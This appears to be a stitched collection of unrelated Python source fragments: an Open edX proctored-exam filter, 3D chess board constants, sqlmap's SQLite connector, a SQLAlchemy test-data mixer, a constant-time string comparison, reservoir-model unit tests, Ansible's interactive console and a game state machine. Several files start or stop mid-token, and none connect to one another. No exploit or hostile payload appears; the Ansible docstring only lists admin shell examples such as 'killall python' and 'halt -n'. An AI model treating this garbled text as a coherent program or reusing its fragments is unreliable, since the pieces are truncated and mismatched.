e.transformer import BlockStructureTransformer, FilteringTransformerMixin class ProctoredExamTransformer(FilteringTransformerMixin, BlockStructureTransformer): """ Exclude proctored exams unless the user is not a verified student or has declined taking the exam. """ VERSION = 1 BLOCK_HAS_PROCTORED_EXAM = 'has_proctored_exam' @classmethod def name(cls): return "proctored_exam" @classmethod def collect(cls, block_structure): """ Compu
tes any information for each XBlock that's necessary to execute this transformer's transform method. Arguments: block_structure (BlockStructureCollectedData) """ block_structure.request_xblock_fields('is_proctored_enabled') block_structure.request_xblock_fields('is_practice_exam') def transform_block_filters(self, usage_info, block_structure): if not settings.FEATURES.get('ENABLE_PROCTORED_EXAMS', False): return [block_structure.create_universal_filter()] def is_proctored_exam_for_user(block_key): """ Test whether the block is a proctored exam for the user in question. """ if ( block_key.block_type == 'sequential' and ( block_structure.get_xblock_field(block_key, 'is_proctored_enabled') or block_structure.get_xblock_field(block_key, 'is_practice_exam') ) ): # This section is an exam. It should be excluded unless the # user is not a verified student or has declined taking the exam. user_exam_summary = get_attempt_status_summary( usage_info.user.id, unicode(block_key.course_key), unicode(block_key), ) return user_exam_summary and user_exam_summary['status'] != ProctoredExamStudentAttemptStatus.declined return [block_structure.create_removal_filter(is_proctored_exam_for_user)]
from panda3d.core import LPoint3

# Game constants for 3D chess variants.
# EDIT GAMEMODE AT THE BOTTOM (CHESS VARIANTS)

# COLORS (RGBA, for the squares)
BLACK = (0, 0, 0, 1)
WHITE = (1, 1, 1, 1)
HIGHLIGHT = (0, 1, 1, 1)
HIGHLIGHT_MOVE = (0, 1, 0, 1)
HIGHLIGHT_ATTACK = (1, 0, 0, 1)

# SCALE (for the 3D representation)
SCALE = 0.5
PIECE_SCALE = 0.3
BOARD_HEIGHT = 1.5

# MODELS
MODEL_PAWN = "models/pawn.obj"
MODEL_ROOK = "models/rook.obj"
MODEL_KNIGHT = "models/knight.obj"
MODEL_BISHOP = "models/bishop.obj"
MODEL_QUEEN = "models/queen.obj"
MODEL_KING = "models/king.obj"
MODEL_UNICORN = "models/unicorn.obj"

# MODEL TEXTURES
TEXTURE_WHITE = "models/light_wood.jpg"
TEXTURE_BLACK = "models/dark_wood.jpg"


# HELPER FUNCTIONS
def square_position(x, y, z, board_size):
    """Return the LPoint3 world position of board square (x, y, z).

    board_size is the (nx, ny, nz) size of the board; squares are centred
    around the board middle in x/y and stacked by BOARD_HEIGHT in z.
    """
    xx, yy, zz = board_size
    wx = (x - (3.5 / 8) * xx) * SCALE
    wy = (y - (3.5 / 8) * yy) * SCALE
    wz = z * BOARD_HEIGHT * SCALE
    return LPoint3(wx, wy, wz)


def square_color(x, y, z):
    """Return BLACK or WHITE so square colors alternate along all three axes."""
    return BLACK if (x + y + z) % 2 == 0 else WHITE


# BOARDS
# 1 = Pawn
# 2 = Rook
# 3 = Knight
# 4 = Bishop
# 5 = Queen
# 6 = King
# 7 = Unicorn
# + = white
# - = black
# First array = lowest level
# Highest part of the array = front (white pieces)
PIECES = {
    0: 'empty space',
    -1: 'black pawn',
    -2: 'black rook',
    -3: 'black knight',
    -4: 'black bishop',
    -5: 'black queen',
    -6: 'black king',
    -7: 'black unicorn',
    1: 'white pawn',
    2: 'white rook',
    3: 'white knight',
    4: 'white bishop',
    5: 'white queen',
    6: 'white king',
    7: 'white unicorn',
}

RAUMSCHACH_PAWN_2STEP = False
RAUMSCHACH_BOARD = [
    [
        [ 2, 3, 6, 3, 2],
        [ 1, 1, 1, 1, 1],
        [ 0, 0, 0, 0, 0],
        [ 0, 0, 0, 0, 0],
        [ 0, 0, 0, 0, 0],
    ],
    [
        [ 4, 7, 5, 7, 4],
        [ 1, 1, 1, 1, 1],
        [ 0, 0, 0, 0, 0],
        [ 0, 0, 0, 0, 0],
        [ 0, 0, 0, 0, 0],
    ],
    [
        [ 0, 0, 0, 0, 0],
        [ 0, 0, 0, 0, 0],
        [ 0, 0, 0, 0, 0],
        [ 0, 0, 0, 0, 0],
        [ 0, 0, 0, 0, 0],
    ],
    [
        [ 0, 0, 0, 0, 0],
        [ 0, 0, 0, 0, 0],
        [ 0, 0, 0, 0, 0],
        [-1,-1,-1,-1,-1],
        [-4,-7,-5,-7,-4],
    ],
    [
        [ 0, 0, 0, 0, 0],
        [ 0, 0, 0, 0, 0],
        [ 0, 0, 0, 0, 0],
        [-1,-1,-1,-1,-1],
        [-2,-3,-6,-3,-2],
    ],
]

SMALL_RAUMSCHACH_PAWN_2STEP = False
SMALL_RAUMSCHACH_BOARD = [
    [
        [ 2, 4, 6, 4, 2],
        [ 3, 1, 1, 1, 3],
        [ 0, 0, 0, 0, 0],
        [ 0, 0, 0, 0, 0],
        [ 0, 0, 0, 0, 0],
    ],
    [
        [ 0, 0, 0, 0, 0],
        [ 0, 0, 0, 0, 0],
        [ 0, 0, 0, 0, 0],
        [ 0, 0, 0, 0, 0],
        [ 0, 0, 0, 0, 0],
    ],
    [
        [ 0, 0, 0, 0, 0],
        [ 0, 0, 0, 0, 0],
        [ 0, 0, 0, 0, 0],
        [-3,-1,-1,-1,-3],
        [-2,-4,-6,-4,-2],
    ],
]

CARD_PAWN_2STEP = True
CARD_BOARD = [
    [
        [ 2, 5, 6, 2],
        [ 1, 1, 1, 1],
        [ 0, 0, 0, 0],
        [ 0, 0, 0, 0],
        [ 0, 0, 0, 0],
        [ 0, 0, 0, 0],
        [ 0, 0, 0, 0],
        [ 0, 0, 0, 0],
    ],
    [
        [ 4, 3, 3, 4],
        [ 1, 1, 1, 1],
        [ 0, 0, 0, 0],
        [ 0, 0, 0, 0],
        [ 0, 0, 0, 0],
        [ 0, 0, 0, 0],
        [-1,-1,-1,-1],
        [-4,-3,-3,-4],
    ],
    [
        [ 0, 0, 0, 0],
        [ 0, 0, 0, 0],
        [ 0, 0, 0, 0],
        [ 0, 0, 0, 0],
        [ 0, 0, 0, 0],
        [ 0, 0, 0, 0],
        [-1,-1,-1,-1],
        [-2,-5,-6,-2],
    ],
]

CLASSIC_PAWN_2STEP = True
CLASSIC_BOARD = [
    [
        [ 2, 3, 4, 5, 6, 4, 3, 2],
        [ 1, 1, 1, 1, 1, 1, 1, 1],
        [ 0, 0, 0, 0, 0, 0, 0, 0],
        [ 0, 0, 0, 0, 0, 0, 0, 0],
        [ 0, 0, 0, 0, 0, 0, 0, 0],
        [ 0, 0, 0, 0, 0, 0, 0, 0],
        [-1,-1,-1,-1,-1,-1,-1,-1],
        [-2,-3,-4,-5,-6,-4,-3,-2],
    ],
]

# NOTE: PAWN_2STEP is whether the pawn can take 2 steps if it's on the second line (bool)
RAUMSCHACH = (RAUMSCHACH_BOARD, RAUMSCHACH_PAWN_2STEP)
SMALL_RAUMSCHACH = (SMALL_RAUMSCHACH_BOARD, SMALL_RAUMSCHACH_PAWN_2STEP)
CARD = (CARD_BOARD, CARD_PAWN_2STEP)
CLASSIC = (CLASSIC_BOARD, CLASSIC_PAWN_2STEP)

TEST_PAWN_2STEP = True
TEST_BOARD = [
    [
        [ 0, 1, 6, 0],
        [ 0, 0, 0, 0],
        [ 0, 0,-2,-2],
        [ 0, 0, 0, 0],
    ],
    [
        [ 0, 1, 6, 0],
        [ 0, 0, 0, 0],
        [ 0, 0,-2,-2],
        [ 0, 0, 0, 0],
    ],
]
# Renamed from TEST: the boolean `TEST = True` at the bottom of this file
# silently shadowed this gamemode tuple. The final module-level value of
# TEST (True) is unchanged, so existing importers are unaffected.
TEST_GAMEMODE = (TEST_BOARD, TEST_PAWN_2STEP)

# Edit gamemode here
GAMEMODE = SMALL_RAUMSCHACH

# Edit players here
HUMANS = (1, )
AIS = (-1, )

BOARD, PAWN_2STEP = GAMEMODE
BOARD_SIZE = (len(BOARD[0][0]), len(BOARD[0]), len(BOARD))

TEST = True
#!/usr/bin/env python """ Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ try: import sqlite3 except ImportError: pass import logging from
lib.core.convert impo
rt utf8encode from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapMissingDependence from plugins.generic.connector import Connector as GenericConnector class Connector(GenericConnector): """ Homepage: http://pysqlite.googlecode.com/ and http://packages.ubuntu.com/quantal/python-sqlite User guide: http://docs.python.org/release/2.5/lib/module-sqlite3.html API: http://docs.python.org/library/sqlite3.html Debian package: python-sqlite (SQLite 2), python-pysqlite3 (SQLite 3) License: MIT Possible connectors: http://wiki.python.org/moin/SQLite """ def __init__(self): GenericConnector.__init__(self) self.__sqlite = sqlite3 def connect(self): self.initConnection() self.checkFileDb() try: self.connector = self.__sqlite.connect(database=self.db, check_same_thread=False, timeout=conf.timeout) cursor = self.connector.cursor() cursor.execute("SELECT * FROM sqlite_master") cursor.close() except (self.__sqlite.DatabaseError, self.__sqlite.OperationalError), msg: warnMsg = "unable to connect using SQLite 3 library, trying with SQLite 2" logger.warn(warnMsg) try: try: import sqlite except ImportError: errMsg = "sqlmap requires 'python-sqlite' third-party library " errMsg += "in order to directly connect to the database '%s'" % self.db raise SqlmapMissingDependence(errMsg) self.__sqlite = sqlite self.connector = self.__sqlite.connect(database=self.db, check_same_thread=False, timeout=conf.timeout) except (self.__sqlite.DatabaseError, self.__sqlite.OperationalError), msg: raise SqlmapConnectionException(msg[0]) self.initCursor() self.printConnected() def fetchall(self): try: return self.cursor.fetchall() except self.__sqlite.OperationalError, msg: logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[0]) return None def execute(self, query): try: self.cursor.execute(utf8encode(query)) except self.__sqlite.OperationalError, msg: 
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[0]) except self.__sqlite.DatabaseError, msg: raise SqlmapConnectionException(msg[0]) self.connector.commit() def select(self, query): self.execute(query) return self.fetchall()
T, Float, INT, INTEGER, Integer, NCHAR, NVARCHAR, NUMERIC, Numeric, SMALLINT, SmallInteger, String, TEXT, TIME, Text, Time, Unicode, UnicodeText, VARCHAR, Enum) from .. import mix_types as t from ..main import ( SKIP_VALUE, LOGGER, TypeMixer as BaseTypeMixer, GenFactory as BaseFactory, Mixer as BaseMixer, partial, faker) class GenFactory(BaseFactory): """ Map a sqlalchemy classes to simple types. """ types = { (String, VARCHAR, Unicode, NVARCHAR, NCHAR, CHAR): str, (Text, UnicodeText, TEXT): t.Text, (Boolean, BOOLEAN): bool, (Date, DATE): datetime.date, (DateTime, DATETIME): datetime.datetime, (Time, TIME): datetime.time, (DECIMAL, Numeric, NUMERIC): decimal.Decimal, (Float, FLOAT): float, (Integer, INTEGER, INT): int, (BigInteger, BIGINT): t.BigInteger, (SmallInteger, SMALLINT): t.SmallInteger, } class TypeMixer(BaseTypeMixer): """ TypeMixer for SQLAlchemy. """ factory = GenFactory def __init__(self, cls, **params): """ Init TypeMixer and save the mapper. """ super(TypeMixer, self).__init__(cls, **params) self.mapper = self.__scheme._sa_class_manager.mapper def postprocess(self, target, postprocess_values): """ Fill postprocess values. """ mixed = [] for name, deffered in postprocess_values: value = deffered.value if isinstance(value, GeneratorType): value = next(value) if isinstance(value, t.Mix): mixed.append((name, value)) continue if isinstance(getattr(target, name), InstrumentedList) and not isinstance(value, list): value = [value] setattr(target, name, value) for name, mix in mixed: setattr(target, name, mix & target) if self.__mixer: target = self.__mixer.postprocess(target) return target @staticmethod def get_default(field): """ Get default value from field. :return va
lue: A default value or NO_VALUE """ column = field.scheme if isinstance(column, RelationshipProperty): column = column.local_remote_pairs[0][0] if not column.default: return SKIP_VALUE if column.default.is_callable: return column.default.arg(None) return getattr(column.default, 'arg', SKIP_VALUE) def gen_select(self, field_name, select): """ Select exi
sts value from database. :param field_name: Name of field for generation. :return : None or (name, value) for later use """ if not self.__mixer or not self.__mixer.params.get('session'): return field_name, SKIP_VALUE relation = self.mapper.get_property(field_name) session = self.__mixer.params.get('session') value = session.query( relation.mapper.class_ ).filter(*select.choices).order_by(func.random()).first() return self.get_value(field_name, value) @staticmethod def is_unique(field): """ Return True is field's value should be a unique. :return bool: """ scheme = field.scheme if isinstance(scheme, RelationshipProperty): scheme = scheme.local_remote_pairs[0][0] return scheme.unique @staticmethod def is_required(field): """ Return True is field's value should be defined. :return bool: """ column = field.scheme if isinstance(column, RelationshipProperty): column = column.local_remote_pairs[0][0] if field.params: return True # According to the SQLAlchemy docs, autoincrement "only has an effect for columns which are # Integer derived (i.e. INT, SMALLINT, BIGINT) [and] Part of the primary key [...]". return not column.nullable and not (column.autoincrement and column.primary_key and isinstance(column.type, Integer)) def get_value(self, field_name, field_value): """ Get `value` as `field_name`. :return : None or (name, value) for later use """ field = self.__fields.get(field_name) if field and isinstance(field.scheme, RelationshipProperty): return field_name, t._Deffered(field_value, field.scheme) return super(TypeMixer, self).get_value(field_name, field_value) def make_fabric(self, column, field_name=None, fake=False, kwargs=None): # noqa """ Make values fabric for column. 
:param column: SqlAlchemy column :param field_name: Field name :param fake: Force fake data :return function: """ kwargs = {} if kwargs is None else kwargs if isinstance(column, RelationshipProperty): return partial(type(self)( column.mapper.class_, mixer=self.__mixer, fake=self.__fake, factory=self.__factory ).blend, **kwargs) ftype = type(column.type) # augmented types created with TypeDecorator # don't directly inherit from the base types if TypeDecorator in ftype.__bases__: ftype = ftype.impl stype = self.__factory.cls_to_simple(ftype) if stype is str: fab = super(TypeMixer, self).make_fabric( stype, field_name=field_name, fake=fake, kwargs=kwargs) return lambda: fab()[:column.type.length] if ftype is Enum: return partial(faker.random_element, column.type.enums) return super(TypeMixer, self).make_fabric( stype, field_name=field_name, fake=fake, kwargs=kwargs) def guard(self, *args, **kwargs): """ Look objects in database. :returns: A finded object or False """ try: session = self.__mixer.params.get('session') assert session except (AttributeError, AssertionError): raise ValueError('Cannot make request to DB.') qs = session.query(self.mapper).filter(*args, **kwargs) count = qs.count() if count == 1: return qs.first() if count: return qs.all() return False def reload(self, obj): """ Reload object from database. """ try: session = self.__mixer.params.get('session') session.expire(obj) session.refresh(obj) return obj except (AttributeError, AssertionError): raise ValueError('Cannot make request to DB.') def __load_fields(self): """ Prepare SQLALchemyTypeMixer. Select columns and relations for data generation. 
""" mapper = self.__scheme._sa_class_manager.mapper relations = set() if hasattr(mapper, 'relationships'): for rel in mapper.relationships: relations |= rel.local_columns yield rel.key, t.Field(rel, rel.key) for key, column in mapper.columns.items(): if column not in relations: yield key, t.Field(column, key) class Mixer(BaseMixer): """ Integration with SQLAlchemy. """ type_mixer_cls = TypeMixer def __init__(self, session=None, commit=True, **params): """Initialize the SQLAlchemy Mixer. :param fake: (True) Generate fake data instead of random data. :param session: SQLAlchemy session. Using for commits. :param commit: (True) Commit instance to session after creation. """ super(Mixer, self).__init__(**params) self.params['session'] = session self.params['commit'] = bool(session) and commit def postprocess(self, target): """ Save objects in db. :return value: A generated value """ if self.params.get('commit'): session = self.params.get('session') if not session: LOGGER.warn("'commit' set true but session not initialized.") else: session.add(target)
# Copyright 2015 Cedraro Andrea <a.cedraro@gmail.com>
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import sys

# On Python 3 the 2.x text type names simply alias str.
if sys.version_info[0] >= 3:
    basestring = str
    unicode = str


def encode_string(value):
    """Return value as UTF-8 encoded bytes; byte strings pass through."""
    if isinstance(value, unicode):
        return value.encode('utf-8')
    return value


def decode_string(value):
    """Return value as text; byte strings are decoded as UTF-8."""
    if isinstance(value, basestring):
        return value
    return value.decode('utf-8')


# hmac.compare_digest were introduced in python 2.7.7
if sys.version_info >= (2, 7, 7):
    from hmac import compare_digest as SecureStringsEqual
else:
    # This is the compare_digest function from python 3.4, adapted for 2.6:
    # http://hg.python.org/cpython/file/460407f35aa9/Lib/hmac.py#l16
    #
    # Stolen from https://github.com/Valloric/ycmd
    def SecureStringsEqual(a, b):
        """Returns the equivalent of 'a == b', but avoids content based
        short circuiting to reduce the vulnerability to timing attacks."""
        # Consistent timing matters more here than data type flexibility
        if not (isinstance(a, str) and isinstance(b, str)):
            raise TypeError("inputs must be str instances")

        # The length of the expected digest is public knowledge, so this
        # early return leaks nothing an attacker would not already know.
        if len(a) != len(b):
            return False

        # Accumulate the XOR of every character pair; zero iff all equal.
        diff = 0
        for x, y in zip(a, b):
            diff |= ord(x) ^ ord(y)
        return diff == 0


def compare_digest(a, b):
    """Constant-time string comparison (thin wrapper over the best backend)."""
    return SecureStringsEqual(a, b)
import unittest
import sys

import numpy as np

from opm.util import EModel

try:
    from tests.utils import test_path
except ImportError:
    from utils import test_path


class TestEModel(unittest.TestCase):
    """Tests for opm.util.EModel: array access, filtering and report steps.

    Idiom cleanup only: the stray C-style semicolons were removed and call
    spacing normalized; every call and assertion is unchanged.
    """

    def test_open_model(self):
        """Only INIT files open; arrays appear in the expected order."""
        refArrList = ["PORV", "CELLVOL", "DEPTH", "DX", "DY", "DZ", "PORO",
                      "PERMX", "PERMY", "PERMZ", "NTG", "TRANX", "TRANY",
                      "TRANZ", "ACTNUM", "ENDNUM", "EQLNUM", "FIPNUM",
                      "FLUXNUM", "IMBNUM", "PVTNUM", "SATNUM", "SWL", "SWCR",
                      "SGL", "SGU", "ISWL", "ISWCR", "ISGL", "ISGU", "PPCW",
                      "PRESSURE", "RS", "RV", "SGAS", "SWAT", "SOMAX", "SGMAX"]

        # Missing path -> RuntimeError; wrong file type -> ValueError.
        self.assertRaises(RuntimeError, EModel, "/file/that/does_not_exists")
        self.assertRaises(ValueError, EModel, test_path("data/9_EDITNNC.EGRID"))
        self.assertRaises(ValueError, EModel, test_path("data/9_EDITNNC.UNRST"))

        mod1 = EModel(test_path("data/9_EDITNNC.INIT"))

        arrayList = mod1.get_list_of_arrays()

        for n, element in enumerate(arrayList):
            self.assertEqual(element[0], refArrList[n])

        celvol1 = mod1.get("CELLVOL")
        self.assertEqual(len(celvol1), 2794)

    def test_add_filter(self):
        """Filters narrow what get() returns; multiple filters AND together."""
        mod1 = EModel(test_path("data/9_EDITNNC.INIT"))

        celvol1 = mod1.get("CELLVOL")
        depth1 = mod1.get("DEPTH")

        self.assertTrue(isinstance(celvol1, np.ndarray))
        self.assertEqual(celvol1.dtype, "float32")

        refVol1 = 2.79083e8
        self.assertTrue(abs((sum(celvol1) - refVol1) / refVol1) < 1.0e-5)

        mod1.add_filter("EQLNUM", "eq", 1)
        mod1.add_filter("DEPTH", "lt", 2645.21)

        refVol2 = 1.08876e8
        refPorvVol2 = 2.29061e7

        porv2 = mod1.get("PORV")
        celvol2 = mod1.get("CELLVOL")

        self.assertTrue(abs((sum(celvol2) - refVol2) / refVol2) < 1.0e-5)
        self.assertTrue(abs((sum(porv2) - refPorvVol2) / refPorvVol2) < 1.0e-5)

        mod1.reset_filter()
        mod1.add_filter("EQLNUM", "eq", 2)
        mod1.add_filter("DEPTH", "in", 2584.20, 2685.21)

        refPorvVol3 = 3.34803e7
        porv3 = mod1.get("PORV")
        self.assertTrue(abs((sum(porv3) - refPorvVol3) / refPorvVol3) < 1.0e-5)

        mod1.reset_filter()
        mod1.add_filter("I", "lt", 10)
        mod1.add_filter("J", "between", 3, 15)
        mod1.add_filter("K", "between", 2, 9)

        poro = mod1.get("PORO")
        self.assertEqual(len(poro), 495)

    def test_paramers(self):
        """Membership tests and per-report-step availability of RS/RV."""
        mod1 = EModel(test_path("data/9_EDITNNC.INIT"))

        self.assertFalse("XXX" in mod1)
        self.assertTrue("PORV" in mod1)
        self.assertTrue("PRESSURE" in mod1)
        self.assertTrue("RS" in mod1)
        self.assertTrue("RV" in mod1)

        self.assertEqual(mod1.active_report_step(), 0)

        rsteps = mod1.get_report_steps()
        self.assertEqual(rsteps, [0, 4, 7, 10, 15, 20, 27, 32, 36, 39])

        mod1.set_report_step(7)

        # parameter RS and RV is missing in report step number 7
        self.assertFalse("RS" in mod1)
        self.assertFalse("RV" in mod1)

        mod1.set_report_step(15)

        self.assertTrue("RS" in mod1)
        self.assertTrue("RV" in mod1)

        arrayList = mod1.get_list_of_arrays()

    def test_rsteps_steps(self):
        """PRESSURE in cell (4, 1, 10) matches the reference value per step."""
        pres_ref_4_1_10 = [272.608, 244.461, 228.503, 214.118, 201.147,
                           194.563, 178.02, 181.839, 163.465, 148.677]

        mod1 = EModel(test_path("data/9_EDITNNC.INIT"))

        mod1.add_filter("I", "eq", 4)
        mod1.add_filter("J", "eq", 1)
        mod1.add_filter("K", "eq", 10)

        self.assertTrue(mod1.has_report_step(4))
        self.assertFalse(mod1.has_report_step(2))

        rsteps = mod1.get_report_steps()

        for n, step in enumerate(rsteps):
            mod1.set_report_step(step)
            pres = mod1.get("PRESSURE")
            self.assertTrue(abs(pres[0] - pres_ref_4_1_10[n]) / pres_ref_4_1_10[n] < 1.0e-5)

    def test_grid_props(self):
        """Grid dimensions and active cell count."""
        mod1 = EModel(test_path("data/9_EDITNNC.INIT"))

        nI, nJ, nK = mod1.grid_dims()
        self.assertEqual((nI, nJ, nK), (13, 22, 11))

        nAct = mod1.active_cells()
        self.assertEqual(nAct, 2794)

    def test_hc_filter(self):
        """The HC filter selects the same cells as per-region DEPTH < FWL filters."""
        nAct_hc_eqln1 = 1090
        nAct_hc_eqln2 = 1694

        mod1 = EModel(test_path("data/9_EDITNNC.INIT"))
        porv = mod1.get("PORV")

        mod1.set_depth_fwl([2645.21, 2685.21])
        mod1.add_hc_filter()

        porv = mod1.get("PORV")
        self.assertEqual(len(porv), nAct_hc_eqln1 + nAct_hc_eqln2)

        mod1.reset_filter()
        mod1.add_filter("EQLNUM", "eq", 1)
        mod1.add_filter("DEPTH", "lt", 2645.21)

        porv1 = mod1.get("PORV")
        self.assertEqual(len(porv1), nAct_hc_eqln1)

        mod1.reset_filter()
        mod1.add_filter("EQLNUM", "eq", 2)
        mod1.add_filter("DEPTH", "lt", 2685.21)

        porv2 = mod1.get("PORV")
        self.assertEqual(len(porv2), nAct_hc_eqln2)

        ivect = mod1.get("I")


if __name__ == "__main__":
    unittest.main()
nicode import to_unicode, to_str from ansible.plugins import module_loader try: from __main__ import display except ImportError: from ansible.utils.display import Display display = Display() class ConsoleCLI(CLI, cmd.Cmd): modules = [] def __init__(self, args): super(ConsoleCLI, self).__init__(args) self.intro = 'Welcome to the ansible console.\nType help or ? to list commands.\n' self.groups = [] self.hosts = [] self.pattern = None self.variable_manager = None self.loader = None self.passwords = dict() self.modules = None cmd.Cmd.__init__(self) def parse(self): self.parser = CLI.base_parser( usage='%prog <host-pattern> [options]', runas_opts=True, inventory_opts=True, connect_opts=True, check_opts=True, vault_opts=True, fork_opts=True, module_opts=True, ) # options unique to shell self.parser.add_option('--step', dest='step', action='store_true', help="one-step-at-a-time: confirm each task before running") self.parser.set_defaults(cwd='*') self.options, self.args = self.parser.parse_args(self.args[1:]) display.verbosity = self.options.verbosity self.validate_conflicts(runas_opts=True, vault_opts=True, fork_opts=True) return True def get_names(self): return dir(self) def cmdloop(self): try: cmd.Cmd.cmdloop(self) except KeyboardInterrupt: self.do_exit(self) def set_prompt(self): login_user = self.options.remote_user or getpass.getuser() self.selected = self.inventory.list_hosts(self.options.cwd) prompt = "%s@%s (%d)[f:%s]" % (login_user, self.options.cwd, len(self.selected), self.options.forks) if self.options.become and self.options.become_user in [None, 'root']: prompt += "# " color = C.COLOR_ERROR else: prompt += "$ " color = C.COLOR_HIGHLIGHT self.prompt = stringc(prompt, color) def list_modules(self): modules = set() if self.options.module_path is not None: for i in self.options.module_path.split(os.pathsep): module_loader.add_directory(i) module_paths = module_loader._get_paths() for path in module_paths: if path is not None: 
modules.update(self._find_modules_in_path(path)) return modules def _find_modules_in_path(self, path): if os.path.isdir(path): for module in os.listdir(path): if module.startswith('.'): continue elif os.path.isdir(module): self._find_modules_in_path(module) elif module.startswith('__'): continue elif any(module.endswith(x) for x in C.BLACKLIST_EXTS): continue elif module in C.IGNORE_FILES: continue elif module.startswith('_'): fullpath = '/'.join([path,module]) if os.path.islink(fullpath): # avoids aliases continue module = module.replace('_', '', 1) module = os.path.splitext(module)[0] # removes the extension yield module def default(self, arg, forceshell=False): """ actually runs modules """ if arg.startswith("#"): return False if not self.options.cwd: display.error("No host found") return False if arg.split()[0] in self.modules: module = arg.split()[0] module_args = ' '.join(arg.split()[1:]) else: module = 'shell' module_args = arg if forceshell is True: module = 'shell' module_args = arg self.options.module_name = module result = None try: check_raw = self.options.module_name in ('command', 'shell', 'script', 'raw') play_ds = dict( name = "Ansible Shell", hosts = self.options.cwd, gather_facts = 'no', tasks = [ dict(action=dict(module=module, args=parse_kv(module_args, check_raw=check_raw)))] ) play = Play().load(play_ds, variable_manager=self.variable_manager, loader=self.loader) except Exception as e: display.error(u"Unable to build command: %s" % to_unicode(e)) return False try: cb = 'minimal' #FIXME: make callbacks configurable # now create a task queue manager to execute the play self._tqm = None try: self._tqm = TaskQueueManager( inventory=self.inventory, variable_manager=self.variable_manager, loader=self.loader, options=self.options, passwords=self.passwords, stdout_callback=cb, run_additional_callbacks=C.DEFAULT_LOAD_CALLBACK_PLUGINS, run_tree=False, ) result = self._tqm.run(play) finally: if self._tqm: self._tqm.cleanup() if self.loader: 
self.loader.cleanup_all_tmp_files() if result is None: display.error("No hosts found") return False except KeyboardInterrupt: display.error('User interrupted execution') return False except Exception as e: display.error(to_unicode(e)) #FIXME: add traceback in very very verbose mode return False def emptyline(self): return def do_shell(self, arg): """ You can run shell commands through the shell module. eg.: shell ps uax | grep java | wc -l shell killall python shell halt -n You can use the ! to force the shell module. eg.: !ps aux | grep java | wc -l """ self.default(arg, True) def do_forks(self, arg): """Set the number of forks""" if not arg: display.display('Usage: forks <number>') return self.options.forks = int(arg) self.set_prompt() do_serial = do_forks def do_verbosity(self, arg): """Set verbosity level""" if not arg: display.display('Usage: verbosity <number>') else: display.verbosity = int(arg) display.v('verbosity level set to %s' % arg) def do_cd(self, arg): """ Change active host/group. You can use hosts patterns as well eg.: cd webservers
cd webservers:dbservers cd webservers:!phoenix cd webservers:&staging cd webservers:dbservers:&s
taging:!phoenix """ if not arg: self.options.cwd = '*' elif arg == '..': try: self.options.cwd = self.inventory.groups_for_host(self.options.cwd)[1].name except Exception: self.options.cwd = '' elif arg in '/*': self.options.cwd = 'all' elif self.inventory.get_hosts(arg): self.options.cwd = arg else: display.display("no host matched") self.set_prompt() def do_list(self, arg): """List the hosts in the current group""" if arg == 'groups': for group in self.groups: display.display(group) else: for host in self.selected: display.display(host.name) def do_become(self, arg): """Toggle whether plays run with become""" if arg: self.options.become = C.mk_boolean(arg) display.v("become changed to %s" % self.options.beco
from abc import ABCMeta, abstractmethod


class ProgressMessage(object):
    """Read-only snapshot of transfer progress for a single file."""

    def __init__(self, path, bytes_per_second, bytes_read, bytes_expected):
        # State lives in private attributes; read-only properties expose it.
        self._path = path
        self._bytes_per_second = bytes_per_second
        self._bytes_read = bytes_read
        self._bytes_expected = bytes_expected

    @property
    def path(self):
        """Path of the file this progress report refers to."""
        return self._path

    @property
    def bytes_per_second(self):
        """Current transfer rate in bytes per second."""
        return self._bytes_per_second

    @property
    def bytes_read(self):
        """Number of bytes transferred so far."""
        return self._bytes_read

    @property
    def bytes_expected(self):
        """Total number of bytes expected for the transfer."""
        return self._bytes_expected


class BucketFile(object):
    """Contract for a single file entry, shared across all bucket backends."""

    def __init__(self, path, name, folder, contentType=None):
        self._path = path
        self._name = name
        self._folder = folder
        self._contentType = contentType
        # Hash and modification date are unknown at construction time and
        # are filled in later by the storage provider.
        self._hash = None
        self._dateModified = None

    # ---- read-only identity -------------------------------------------
    @property
    def path(self):
        """Full path of the entry inside the bucket."""
        return self._path

    @property
    def name(self):
        """Base name of the entry."""
        return self._name

    @property
    def isFolder(self):
        """True when this entry represents a folder rather than a file."""
        return self._folder

    # ---- mutable metadata ---------------------------------------------
    # Explicit get_*/set_* accessors are part of the public contract and
    # are therefore kept; the property aliases below wrap them.
    def get_hash(self):
        return self._hash

    def set_hash(self, value):
        self._hash = value

    def get_dateModified(self):
        return self._dateModified

    def set_dateModified(self, value):
        self._dateModified = value

    def get_content_type(self):
        return self._contentType

    def set_content_type(self, value):
        self._contentType = value

    hash = property(get_hash, set_hash)
    dateModified = property(get_dateModified, set_dateModified)
    contentType = property(get_content_type, set_content_type)


class AbstractProvider:
    """
    Contract for storage backends, e.g. Amazon S3, local files,
    OpenStack Swift, and so on.
    """
    # NOTE: Python-2-style ABC declaration, preserved as written.
    __metaclass__ = ABCMeta

    @abstractmethod
    def delete_object(self, path):
        return NotImplemented

    @abstractmethod
    def list_dir(self, path):
        return NotImplemented

    @abstractmethod
    def authenticate(self):
        """ Return True is it works, False if it fails """
        return False

    @abstractmethod
    def download_object(self, sourcePath, targetPath):
        """ Download source to target """
        return NotImplemented
from direct.directnotify import DirectNotifyGlobal
from BaseActivityFSM import BaseActivityFSM
from activityFSMMixins import (
    IdleMixin,
    RulesMixin,
    ActiveMixin,
    DisabledMixin,
    ConclusionMixin,
    WaitForEnoughMixin,
    WaitToStartMixin,
    WaitClientsReadyMixin,
    WaitForServerMixin,
)


class FireworksActivityFSM(BaseActivityFSM, IdleMixin, ActiveMixin, DisabledMixin):
    """FSM for the fireworks activity: Idle -> Active -> Disabled (terminal)."""
    notify = DirectNotifyGlobal.directNotify.newCategory('FireworksActivityFSM')

    def __init__(self, activity):
        FireworksActivityFSM.notify.debug('__init__')
        BaseActivityFSM.__init__(self, activity)
        # Allowed state transitions; absent entries are rejected moves.
        self.defaultTransitions = {
            'Idle': ['Active', 'Disabled'],
            'Active': ['Disabled'],
